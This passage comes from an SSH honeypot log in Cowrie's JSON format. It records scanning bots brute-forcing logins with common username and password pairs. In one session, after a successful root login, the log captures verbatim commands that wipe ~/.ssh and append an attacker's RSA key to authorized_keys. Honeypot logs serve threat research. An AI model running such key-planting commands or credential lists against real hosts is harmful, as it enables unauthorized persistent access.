6","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:45:23.145230Z","src_ip":"134.199.174.250","session":"6e65603f581e"}
{"eventid":"cowrie.login.failed","username":"backup","password":"admin123","message":"login attempt [backup/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:45:24.165928Z","src_ip":"134.199.174.250","session":"6e65603f581e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:25.441530Z","src_ip":"134.199.174.250","session":"6e65603f581e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39230,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c183f6e586c","protocol":"ssh","message":"New connection: 212.227.235.229:39230 (1.2.3.4:22) [session: 3c183f6e586c]","sensor":"my-vps","timestamp":"2025-09-08T13:45:30.238315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:45:30.239234Z","src_ip":"212.227.235.229","session":"3c183f6e586c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:45:30.360295Z","src_ip":"212.227.235.229","session":"3c183f6e586c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234567","message":"login attempt [admin/admin1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T13:45:30.888167Z","src_ip":"212.227.235.229","session":"3c183f6e586c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:32.012025Z","src_ip":"212.227.235.229","session":"3c183f6e586c"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50308,"dst_ip":"1.2.3.4","dst_port":22,"session":"025cde01b10d","protocol":"ssh","message":"New connection: 134.199.174.250:50308 (1.2.3.4:22) [session: 025cde01b10d]","sensor":"my-vps","timestamp":"2025-09-08T13:45:51.865090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:45:51.948257Z","src_ip":"134.199.174.250","session":"025cde01b10d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:45:52.165558Z","src_ip":"134.199.174.250","session":"025cde01b10d"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234","message":"login attempt [backup/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:45:53.356739Z","src_ip":"134.199.174.250","session":"025cde01b10d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:54.659652Z","src_ip":"134.199.174.250","session":"025cde01b10d"}
{"eventid":"cowrie.session.connect","src_ip":"1.92.34.210","src_port":33648,"dst_ip":"1.2.3.4","dst_port":22,"session":"d548ed7ef574","protocol":"ssh","message":"New connection: 1.92.34.210:33648 (1.2.3.4:22) [session: d548ed7ef574]","sensor":"my-vps","timestamp":"2025-09-08T13:45:58.994057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:45:58.994894Z","src_ip":"1.92.34.210","session":"d548ed7ef574"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T13:45:59.227785Z","src_ip":"1.92.34.210","session":"d548ed7ef574"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:06.996489Z","src_ip":"1.92.34.210","session":"d548ed7ef574"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37946,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d198a575577","protocol":"ssh","message":"New connection: 212.227.235.229:37946 (1.2.3.4:22) [session: 5d198a575577]","sensor":"my-vps","timestamp":"2025-09-08T13:46:13.447712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:13.448394Z","src_ip":"212.227.235.229","session":"5d198a575577"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:13.675662Z","src_ip":"212.227.235.229","session":"5d198a575577"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"0","message":"login attempt [ctf/0] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:14.628628Z","src_ip":"212.227.235.229","session":"5d198a575577"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:15.861830Z","src_ip":"212.227.235.229","session":"5d198a575577"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:17.366459Z","src_ip":"212.227.235.229","session":"b62ebd9c2d8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42122,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcd8aebe899b","protocol":"ssh","message":"New connection: 212.227.235.229:42122 (1.2.3.4:22) [session: dcd8aebe899b]","sensor":"my-vps","timestamp":"2025-09-08T13:46:19.178620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:19.180624Z","src_ip":"212.227.235.229","session":"dcd8aebe899b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:19.334851Z","src_ip":"212.227.235.229","session":"dcd8aebe899b"}
{"eventid":"cowrie.login.failed","username":"red","password":"2025","message":"login attempt [red/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:19.841143Z","src_ip":"212.227.235.229","session":"dcd8aebe899b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:20.946352Z","src_ip":"212.227.235.229","session":"dcd8aebe899b"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"d61ed8d7ac76","protocol":"ssh","message":"New connection: 134.199.174.250:46482 (1.2.3.4:22) [session: d61ed8d7ac76]","sensor":"my-vps","timestamp":"2025-09-08T13:46:21.372931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:46:21.387656Z","src_ip":"134.199.174.250","session":"d61ed8d7ac76"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:46:21.706266Z","src_ip":"134.199.174.250","session":"d61ed8d7ac76"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123","message":"login attempt [backup/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:23.007760Z","src_ip":"134.199.174.250","session":"d61ed8d7ac76"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:24.341317Z","src_ip":"134.199.174.250","session":"d61ed8d7ac76"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":13407,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88c77cdfe0a","protocol":"ssh","message":"New connection: 49.247.35.31:13407 (1.2.3.4:22) [session: d88c77cdfe0a]","sensor":"my-vps","timestamp":"2025-09-08T13:46:27.616668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:27.617726Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:27.899976Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass@2024","message":"login attempt [root/Pass@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:46:28.975472Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:46:29.520058Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:46:29.520802Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:46:29.521673Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:29.797082Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:46:30.437713Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:46:30.438375Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:46:30.716386Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:30.717429Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":49062,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6ffb597799d","protocol":"ssh","message":"New connection: 49.247.35.31:49062 (1.2.3.4:22) [session: f6ffb597799d]","sensor":"my-vps","timestamp":"2025-09-08T13:46:30.998832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:31.014320Z","src_ip":"49.247.35.31","session":"f6ffb597799d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:31.305104Z","src_ip":"49.247.35.31","session":"f6ffb597799d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:32.476525Z","src_ip":"49.247.35.31","session":"f6ffb597799d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:33.779130Z","src_ip":"49.247.35.31","session":"f6ffb597799d"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":5610,"dst_ip":"1.2.3.4","dst_port":22,"session":"096b386591a1","protocol":"ssh","message":"New connection: 49.247.35.31:5610 (1.2.3.4:22) [session: 096b386591a1]","sensor":"my-vps","timestamp":"2025-09-08T13:46:34.094876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:34.096199Z","src_ip":"49.247.35.31","session":"096b386591a1"}
